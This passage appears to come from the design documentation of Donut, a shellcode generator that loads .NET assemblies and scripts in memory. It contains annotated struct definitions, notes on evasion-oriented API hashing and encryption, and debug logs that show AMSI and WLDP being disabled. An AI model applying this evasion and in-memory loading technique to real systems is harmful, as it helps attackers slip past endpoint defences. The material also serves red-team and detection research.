144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
